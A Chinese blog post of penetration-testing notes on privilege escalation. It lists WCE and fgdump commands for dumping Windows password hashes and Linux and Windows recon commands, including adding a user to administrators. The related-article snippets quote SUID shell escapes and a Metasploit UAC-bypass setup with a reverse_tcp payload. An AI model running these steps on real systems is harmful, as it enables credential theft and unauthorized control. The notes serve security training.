渗透测试-提权

最新推荐文章于 2024-08-26 21:57:53 发布
最新推荐文章于 2024-08-26 21:57:53 发布
阅读量119 收藏 1
点赞数
分类专栏: kali_linux渗透测试 文章标签: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42952508/article/details/125203033
版权

提权

  • 已实现本地低权限账号登录
    • 远程溢出
    • 直接获得账号密码
  • 希望获取更好权限
    • 实现对目标进一步控制

本地提权

  • 系统账号之间权限隔离
    • 操作系统安全的基础
    • 用户空间
    • 内核空号
  • 系统账号
    • 用户账号登录时获取权限令牌
    • 服务账号无需用户邓丽已在后台启动服务
  • Windows
    • user
    • Administrator
    • System
  • Linux
    • User
    • Root

键盘记录

  • Keylogger

  • 木马窃取

  • 密码窃取

WCE使用教程:

  • 下载地址:https://www.ampliasecurity.com/research/windows-credentials-editor/
WCE -l  #查看用户密码hash值		


wce  -lv  #查看详细信息

在这里插入图片描述

wce -d  [LUID]  
#从内存中删除一个用户

使用wce去修改用户

  • 首先我们看系统有两个用户,现在我们把sbz改成administrator

在这里插入图片描述

  • 通过下面命令去执行

在这里插入图片描述

在这里插入图片描述

WCE

  • 从内存读取LM / NTLM hash
  • 目前的操作系统无法使用,因内存有安全包,例如现在的操作使用wce -w,操作系统会崩溃,强制关机;

fgdump

  • 该工具再kali的目录为/usr/share/windows-binaries/fgdump
  • 将其拷贝至windows下,直接双击,之后会生成三个文件

在这里插入图片描述

  • 其中一个文件就包含hash值

基本信息收集

LINUX

/etc/resolv.conf  #收集DNS信息
/etc/passwd  #收集用户账号信息
whoami  #查看当前用户
who -a #查看当前所有登录用户
ifconfig -a #查看当前IP地址
iptables -L -n #查看当前防火墙设置
netstat -rn #查看当前系统路由
uname -a  #查看当前系统版本
ps aux #查看当前系统进程
dpkg -l | head  #列出所有的安装软件包

windows

ipconfig /all  #查看所有网络信息
ifconfig /displaydns  #查看dns缓存
netstat -bnao  #查看程序进程
netstat -r  #查看路由
net view / net view /domain  #查看网络共享
net user /domain  , net user %username% /domian  #查看域信息

net accounts #查看账户信息
net share #查看共享
net localgroup administrators [usernmae] /add  #将用户加入administrator组中

net group "[组名称]" /domian #查看组中的用户

net share name$=C:\ /unlimited  #添加一个共享

net user [username] /active:yes  /domian #将域中的用户给启用
网络点点滴
关注
专栏目录
渗透测试】--- suid提权
qq_43168364的博客
01-13 848
可以用suid来提取的命令(前提是这些命令设置了suid权限) nmap vim nano find bash more less cp awk man 1.nmap 执行:nmap --script=exe.nse,脚本中的内容写:os.execute("/bin/bash") 2.vim 进入vim的编辑模式,执行::set shell=/bin/bash ; :shell 3.nano 执行:nano /etc/passwd , 即可添加root用户 4.find 执行:find /
渗透测试框架提权
weixin_43873557的博客
02-10 168
01 Metasploit提权模块 ➢ Meterpreter自动提权命令 getsystem getuid ➢ 提权命令执行失败,绕过uac use exploit/windows/local/bypassuac set payload windows/meterpreter/reverse_tcp set LHOST=192.168.1.170 set session 1 exploit use exploit/windows/local/bypassuac_injection set payloa
渗透测试 提权
07-18
本文档描述了渗透提权的基本套路
渗透测试笔记】之【提权
AA8j的博客
06-03 531
操作系统默认用户 Windows User Administrator System Linux User Root Windows USER->System WinXP、03 at 10:11 /intertractive cmd Win7、8 sc Create syscmd binPath="cmd /K start" type=own type=interact sc start syscmd 利用开发工具 首先下载微软开发工具包:https://download.sysin
WEB渗透Win提权篇-弱权限提权
最新发布
qq_59468567的博客
08-26 265
提权工具合集包: 夸克网盘分享WEB渗透Win提权篇-提权工具合集-CSDN博客WEB渗透Win提权篇-RDP&Firewall-CSDN博客WEB渗透Win提权篇-MSSQL-CSDN博客WEB渗透Win提权篇-MYSQL-udf-CSDN博客WEB渗透Win提权篇-AccountSpoofing-CSDN博客条件:服务帐号 upnphost 如果由于缺少依赖项而失败,请尝试以下命令。 使用accesschk 弱注册表权限 检查有KEY_ALL_ACCESS权限的注册表项 查询路
渗透测试提权
Forget_liu的博客
05-06 501
主要针对网站测试过程中,当测试某一网站时,通过各种漏洞提升webshell权限来拿到该服务器的权限。此时已经获得了站点的webshell权限,提权后获得服务器权限,就可以对站点B,C进行操作。
渗透测试提权方式总结
qq_29864185的博客
07-06 2099
目录 一、 什么是提权 二、怎样进行提权提权的方式有哪些) 1、系统漏洞提权 (1)Windows提权 (2)Linux系统提权 2、数据库提权 (1)MySQL数据库提权 3、系统配置不当提权 4、权限继承类提权 5、第三方软件/服务提权6、WebServer漏洞提权 一、 什么是提权 提权就是通过各种办法和漏洞,提高自己在服务器中的权限,以便控制全局。 Windows:User >> System Linux:User >> Root 二、怎样进
提权方式及原理简介(面试)
jklbnm12的博客
02-21 2410
一、提权 想了解原理首先要明白什么叫提权,为什么要提权,通常获取到Shell之后,假如我们拿到的是普通权限比如mysql、tomcat等普通应用权限,那我们如果想在内网畅通无阻,那肯定第一步需要获取到管理员最起码要是administrator甚至是system。 这种获取最高权限的方式就叫提权。 二、提权方式 1、系统本地漏洞提权 2、数据库提权 3、第三方软件提权 4、获取高权限用户比如msf的getsystem提权等 三、分类 Windows提权 Windows提权一般为系统漏洞提权, wmic qf
内网渗透测试-提权工具
05-25
本文将深入探讨提权工具及其在内网渗透测试中的应用。 提权工具通常分为Windows系统和Linux系统的工具,因为这两种操作系统在企业环境中最为常见。Windows提权工具有如Meterpreter、Psexec、Empire等。Meterpreter...
93-93.渗透测试-后渗透之提权.mp4
05-10
93-93.渗透测试-后渗透之提权.mp4
渗透测试——权限提升
世间繁华梦一出
03-01 1797
提权一、什么是提权二、怎样进行提权提权的方式有哪些)1、系统漏洞提权(Linux、Windows) 一、什么是提权 提权就是通过各种办法和漏洞,提升自己在服务器中的权限,以便控制全局。 windows:User >> System linux: User >> Root 二、怎样进行提权提权的方式有哪些) 1、系统漏洞提权(Linux、Windows) 2、数据库提权 3、系统配置错误提权 4、权限继承类提权 5、第三方软件/服务提权 6、WebServer漏洞提权 1、系统
渗透测试技术----提权(本地提权)
wwl012345的博客
07-22 2873
一、开启Kali共享文件夹(拓展,与提权无关) 1.对于很多使用虚拟机的朋友来说,最头疼的就是无法把物理机上的文件移动到虚拟机上,这有两种方法,一种是安装Vmtools软件,还有一种就是开启共享文件夹。方法如下 虚拟机–>设置–>选项–>共享文件夹–>总是启用–>添加–>选择在物理机上建立的文件夹(这一步很重要,如果没有连接到物理机上的共享文件夹,那么相当于没...
渗透测试提权指南
遇事不决冲冲冲
12-04 7529
windows系统提权 参考内网安全攻防:渗透测试实战指南(百度百科) 一.系统内核漏洞 利用已存在未安装补丁的漏洞进行提权 参考Windows系统内核溢出漏洞提权 1.手动寻找缺失补丁 拿到权限后通过如下命令查看系统安装了哪些补丁 systeminfo wmic qfe get caption,description,hotfixid,installedon 比CMD更强大的命令行:WMIC后渗透利用(系统命令) 通过没有列出的补丁号,寻找相应的提权EXP进行提权(挺离谱的感觉) 系统漏洞与对应的
渗透怎么学?渗透测试中超全的提权思路来了!
bdfcfff77fa的博客
06-26 1161
尽量能够获取webshell,如果获取不到webshell可以在有文件上传的地方上传反弹shell脚本;或者利用漏洞(系统漏洞,服务器漏洞,第三方软件漏洞,漏洞)来获取shell。利用kali虚拟机msfVENOM编写反弹shell脚本被控制端发起的shell---通常用于被控制端因防火墙受限,权限不足、端口被占用。
108.网络安全渗透测试—[权限提升篇6]—[Windows内核溢出提权]
qwsn
07-04 2686
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! window 服务器常用的是win2003、win2008和win2012。在渗透测试中 ,我们获取的权限是iis_user用户组 ,要更高的权限就需要把当前的用户提权到系统用户或超级管理员用户组。更高的权限方便我们在后续的渗透中,扩大范围测试。 在iis里面,权限依次的大小对比:,aspx默认能执行终端命令、php和asp如果不能执行命令,在wscript.shell组件没有删除的情况下,可以上传c
渗透测试——提权方式总结
热门推荐
橘子女侠
06-11 3万+
(内容整理自网络) 一、 什么是提权 提权就是通过各种办法和漏洞,提高自己在服务器中的权限,以便控制全局。 Windows:User >> System Linux:User >> Root 二、怎样进行提权提权的方式有哪些) 1.、系统漏洞提权(Linux、Windows) 2、数据库提权 3、系统配置错误提权 4、权限继承类提权 5、第三方软件...
渗透测试提权-Liinux权限提升
LCW991207的博客
09-24 654
呕心沥血6个小时写成:非漏洞提权(suid,sudo,NFS,PATH,LD_PRELOAD,Cron,DOCKER,LXD)漏洞提权(Linux内核提权漏洞)
渗透测试:掌握提权技巧与常见漏洞利用
提权,或提升权限,是渗透测试中关键的一个环节,它指的是通过技巧和发现的漏洞,将用户的权限提升至更高层次,例如在Windows中从User提升到System,在Linux中从User提升到Root,从而能够对系统进行更深入的操作。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值